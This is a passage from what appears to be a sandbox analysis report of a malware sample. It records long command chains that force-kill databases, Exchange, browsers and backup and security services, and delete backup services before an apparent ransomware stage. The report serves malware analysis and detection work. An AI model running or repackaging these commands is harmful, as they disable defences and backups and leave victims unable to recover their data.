  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Launchpad.exe /F
      4⤵
      Kills process with taskkill
      PID:4876
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mpdwsvc.exe /F
      4⤵
      PID:5528
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cbVSCService11.exe /F
      4⤵
      Kills process with taskkill
      PID:4004
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cbService.exe /F
      4⤵
      PID:5740
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CobianBackup11
      4⤵
      Launches sc.exe
      PID:836
  - - C:\Windows\SysWOW64\sc.exe
      sc delete cbVSCService11
      4⤵
      Launches sc.exe
      PID:3480
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mysqld-nt.exe /F
      4⤵
      PID:5568
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F
      4⤵
      PID:5756
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlceip.exe /F
      4⤵
      PID:3436
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM store.exe
      4⤵
      PID:5264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeMailboxReplication.exe
      4⤵
      PID:4376
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe
      4⤵
      PID:5820
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeThrottling.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4388
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM EdgeTransport.exe
      4⤵
      PID:5528
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeTransportLogSearch.exe
      4⤵
      PID:5064
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe
      4⤵
      PID:5988
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5528
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM DataCollectorSvc.exe
      4⤵
      PID:1600
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.ServiceHost.exe
      4⤵
      PID:232
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe
      4⤵
      PID:692
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeMailboxAssistants.exe
      4⤵
      PID:2832
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "postgresql-x64-9.4"
        5⤵
        
        PID:1188
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msexchangerepl.exe
      4⤵
      PID:1292
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe
      4⤵
      PID:3172
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe
      4⤵
      Kills process with taskkill
      PID:4924
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MsExchangeFDS.exe
      4⤵
      PID:6072
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeMailSubmission.exe
      4⤵
      PID:436
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM MSExchangeTransport.exe
      4⤵
      PID:4952
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe
      4⤵
      PID:832
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
    3⤵
    PID:456
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSOLAP$SHOPCONTROL9"
      4⤵
      PID:1780
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
        5⤵
        
        PID:5340
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$SHOPCONTROL9"
      4⤵
      PID:5808
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9"
        5⤵
        
        PID:5556
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLFDLauncher$SHOPCONTROL9"
      4⤵
      PID:5324
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"
        5⤵
        
        PID:3284
  - - C:\Windows\SysWOW64\net.exe
      net stop "ReportServer$SHOPCONTROL9"
      4⤵
      PID:5328
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SHOPCONTROL9"
        5⤵
        
        PID:5752
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLAgent$SHOPCONTROL9"
      4⤵
      PID:5144
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SHOPCONTROL9"
        5⤵
        
        PID:5612
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Client Service"
      4⤵
      PID:5452
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Client Service"
        5⤵
        
        PID:2956
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Discovery Framework"
      4⤵
      PID:5636
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Discovery Framework"
        5⤵
        
        PID:5508
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Legacy Client Service"
      4⤵
      PID:5544
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Legacy Client Service"
        5⤵
        
        PID:5312
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Legacy Network Service"
      4⤵
      PID:376
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Legacy Network Service"
        5⤵
        
        PID:5880
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup Proxy Service"
      4⤵
      PID:5852
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetBackup Proxy Service"
        5⤵
        
        PID:5736
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetBackup SAN Client Fibre Transport Service"
      4⤵
      PID:6136
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mysqld-nt.exe /F
      4⤵
      PID:1724
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM NFVPrint.exe /F
      4⤵
      Kills process with taskkill
      PID:1336
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM licenceserver.exe /F
      4⤵
      PID:836
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Launchpad.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4004
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM "FileZilla Server.exe"
      4⤵
      PID:5296
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM cbService.exe
      4⤵
      PID:5596
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM cbInterface.exe
      4⤵
      PID:1440
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM pvxwin32.exe
      4⤵
      PID:2984
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM pvxwin64.exe
      4⤵
      PID:448
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM pvxcom.exe
      4⤵
      PID:6084
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM pvxiosvr.exe
      4⤵
      PID:5728
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Sage.NA.AT_AU.SysTray.exe
      4⤵
      PID:5720
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Sage.NA.AT_AU.Service.exe
      4⤵
      PID:5900
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
    3⤵
    PID:3688
  - - C:\Windows\SysWOW64\net.exe
      net stop UIODetect
      4⤵
      PID:5020
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UIODetect
        5⤵
        
        PID:5232
  - - C:\Windows\SysWOW64\net.exe
      net stop VMwareHostd
      4⤵
      PID:4032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMwareHostd
        5⤵
        
        PID:2976
  - - C:\Windows\SysWOW64\net.exe
      net stop TeamViewer8
      4⤵
      Discovers systems in the same network
      PID:5464
  - - C:\Windows\SysWOW64\net.exe
      net stop VMUSBArbService
      4⤵
      PID:1588
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMUSBArbService
        5⤵
        
        PID:5400
  - - C:\Windows\SysWOW64\net.exe
      net stop VMAuthdService
      4⤵
      PID:3832
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMAuthdService
        5⤵
        
        PID:5544
  - - C:\Windows\SysWOW64\net.exe
      net stop wanxiao-monitor
      4⤵
      PID:4244
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wanxiao-monitor
        5⤵
        
        PID:1652
  - - C:\Windows\SysWOW64\net.exe
      net stop WebAttendServer
      4⤵
      PID:6128
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop WebAttendServer
        5⤵
        
        PID:4560
  - - C:\Windows\SysWOW64\net.exe
      net stop mysqltransport
      4⤵
      PID:2924
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mysqltransport
        5⤵
        
        PID:5400
  - - C:\Windows\SysWOW64\net.exe
      net stop VMnetDHCP
      4⤵
      PID:5200
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMnetDHCP
        5⤵
        
        PID:5228
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TMBMServer"
        6⤵
        
        PID:5128
  - - C:\Windows\SysWOW64\net.exe
      net stop "VMware NAT Service"
      4⤵
      PID:5752
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "VMware NAT Service"
        5⤵
        
        PID:3568
  - - C:\Windows\SysWOW64\net.exe
      net stop Tomcat8
      4⤵
      PID:6132
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Tomcat8
        5⤵
        
        PID:6024
  - - C:\Windows\SysWOW64\net.exe
      net stop TeamViewer
      4⤵
      Discovers systems in the same network
      PID:5352
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TeamViewer
        5⤵
        
        PID:5056
  - - C:\Windows\SysWOW64\net.exe
      net stop QPCore
      4⤵
      PID:5984
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop QPCore
        5⤵
        
        PID:1652
  - - C:\Windows\SysWOW64\net.exe
      net stop CASLicenceServer
      4⤵
      PID:4924
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASLicenceServer
        5⤵
        
        PID:5916
  - - C:\Windows\SysWOW64\net.exe
      net stop CASWebServer
      4⤵
      PID:2884
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASWebServer
        5⤵
        
        PID:5552
  - - C:\Windows\SysWOW64\net.exe
      net stop AutoUpdateService
      4⤵
      PID:4300
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AutoUpdateService
        5⤵
        
        PID:6112
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Detect Service"
      4⤵
      PID:4496
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Update Service"
      4⤵
      PID:1788
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
  - - C:\Windows\SysWOW64\net.exe
      net stop "AliyunService"
      4⤵
      PID:744
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "AliyunService"
        5⤵
        
        PID:5300
  - - C:\Windows\SysWOW64\net.exe
      net stop CASXMLService
      4⤵
      PID:232
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASXMLService
        5⤵
        
        PID:5616
  - - C:\Windows\SysWOW64\net.exe
      net stop AGSService
      4⤵
      PID:5840
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AGSService
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5436
  - - C:\Windows\SysWOW64\net.exe
      net stop RapService
      4⤵
      PID:3988
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RapService
        5⤵
        
        PID:676
  - - C:\Windows\SysWOW64\net.exe
      net stop DDNSService
      4⤵
      PID:4360
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DDNSService
        5⤵
        
        PID:5020
  - - C:\Windows\SysWOW64\net.exe
      net stop iNethinkSQLBackupSvc
      4⤵
      PID:696
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop iNethinkSQLBackupSvc
        5⤵
        
        PID:5064
  - - C:\Windows\SysWOW64\net.exe
      net stop CASVirtualDiskService
      4⤵
      PID:4392
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASVirtualDiskService
        5⤵
        
        PID:5764
  - - C:\Windows\SysWOW64\net.exe
      net stop CASMsgSrv
      4⤵
      PID:5400
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASMsgSrv
        5⤵
        
        PID:5428
  - - C:\Windows\SysWOW64\net.exe
      net stop "OracleOraDb10g_homeliSQL*Plus"
      4⤵
      PID:208
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "OracleOraDb10g_homeliSQL*Plus"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5952
  - - C:\Windows\SysWOW64\net.exe
      net stop OracleDBConsoleilas
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1780
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop OracleDBConsoleilas
        5⤵
        
        PID:6128
  - - C:\Windows\SysWOW64\net.exe
      net stop MySQL
      4⤵
      PID:692
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MySQL
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4360
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdAppService1220
      4⤵
      PID:7252
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdAppService1220
        5⤵
        
        PID:7408
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdTaskService1220
      4⤵
      PID:6184
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdTaskService1220
        5⤵
        
        PID:2348
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdUpgradeService1220
      4⤵
      PID:8040
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdUpgradeService1220
        5⤵
        
        PID:6608
  - - C:\Windows\SysWOW64\net.exe
      net stop K3MobileServiceManage
      4⤵
      PID:6532
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop K3MobileServiceManage
        5⤵
        
        PID:6912
  - - C:\Windows\SysWOW64\net.exe
      net stop "FileZilla Server"
      4⤵
      PID:6636
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "FileZilla Server"
        5⤵
        
        PID:7456
  - - C:\Windows\SysWOW64\net.exe
      net stop DDVRulesProcessor
      4⤵
      PID:1900
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DDVRulesProcessor
        5⤵
        
        PID:5380
  - - C:\Windows\SysWOW64\net.exe
      net stop ImtsEventSvr
      4⤵
      PID:6392
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ImtsEventSvr
        5⤵
        
        PID:6688
  - - C:\Windows\SysWOW64\net.exe
      net stop AutoUpdatePatchService
      4⤵
      PID:5764
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AutoUpdatePatchService
        5⤵
        
        PID:4544
  - - C:\Windows\SysWOW64\net.exe
      net stop OMAILREPORT
      4⤵
      PID:5308
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop OMAILREPORT
        5⤵
        
        PID:7580
  - - C:\Windows\SysWOW64\net.exe
      net stop "Dell Hardware Support"
      4⤵
      PID:7068
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Dell Hardware Support"
        5⤵
        
        PID:6264
  - - C:\Windows\SysWOW64\net.exe
      net stop SupportAssistAgent
      4⤵
      PID:5448
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SupportAssistAgent
        5⤵
        
        PID:6436
  - - C:\Windows\SysWOW64\net.exe
      net stop K3MMainSuspendService
      4⤵
      PID:2904
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop K3MMainSuspendService
        5⤵
        
        PID:5080
  - - C:\Windows\SysWOW64\net.exe
      net stop KpService
      4⤵
      PID:7568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop KpService
        5⤵
        
        PID:8004
  - - C:\Windows\SysWOW64\net.exe
      net stop ceng_web_svc_d
      4⤵
      PID:1828
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ceng_web_svc_d
        5⤵
        
        PID:6140
  - - C:\Windows\SysWOW64\net.exe
      net stop KugouService
      4⤵
      PID:5676
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop KugouService
        5⤵
        
        PID:7216
  - - C:\Windows\SysWOW64\net.exe
      net stop pcas
      4⤵
      PID:7320
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop pcas
        5⤵
        
        PID:6688
  - - C:\Windows\SysWOW64\net.exe
      net stop U8SendMailAdmin
      4⤵
      PID:6672
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8SendMailAdmin
        5⤵
        
        PID:1052
  - - C:\Windows\SysWOW64\net.exe
      net stop "Bonjour Service"
      4⤵
      PID:6352
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Bonjour Service"
        5⤵
        
        PID:8020
  - - C:\Windows\SysWOW64\net.exe
      net stop "Apple Mobile Device Service"
      4⤵
      PID:7012
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Apple Mobile Device Service"
        5⤵
        
        PID:6472
  - - C:\Windows\SysWOW64\net.exe
      net stop "ABBYY.Licensing.FineReader.Professional.12.0"
      4⤵
      PID:7884
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "ABBYY.Licensing.FineReader.Professional.12.0"
        5⤵
        
        PID:6460
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup.Service.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
    3⤵
    PID:4568
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlservr.exe /F
      4⤵
      PID:5480
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM httpd.exe /F
      4⤵
      PID:5436
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM java.exe /F
      4⤵
      PID:3848
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdhost.exe /F
      4⤵
      PID:544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdlauncher.exe /F
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Veeam.Backup.Service.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5272
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM reportingservicesservice.exe /F
      4⤵
      PID:2624
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM softmgrlite.exe /F
      4⤵
      PID:264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlbrowser.exe /F
      4⤵
      PID:1788
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ssms.exe /F
      4⤵
      PID:5180
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vmtoolsd.exe /F
      4⤵
      Kills process with taskkill
      PID:3200
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM baidunetdisk.exe /F
      4⤵
      PID:1608
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM yundetectservice.exe /F
      4⤵
      Kills process with taskkill
      PID:5440
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ssclient.exe /F
      4⤵
      PID:5232
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNAupdaemon.exe /F
      4⤵
      PID:232
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RAVCp164.exe /F
      4⤵
      PID:5604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxEM.exe /F
      4⤵
      PID:3464
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxHK.exe /F
      4⤵
      PID:3136
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxTray.exe /F
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM 360bdoctor.exe /F
      4⤵
      PID:5300
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      PID:5692
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM PrivacyIconClient.exe /F
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UIODetect.exe /F
      4⤵
      PID:4356
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AutoDealService.exe /F
      4⤵
      PID:5872
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IDDAService.exe /F
      4⤵
      PID:1584
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM EnergyDataService.exe /F
      4⤵
      PID:716
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MPService.exe /F
      4⤵
      PID:5804
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TransMain.exe /F
      4⤵
      PID:7232
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DAService.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5256
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoogleCrashHandler.exe /F
      4⤵
      PID:5736
  - - C:\Windows\SysWOW64\taskkill.exe
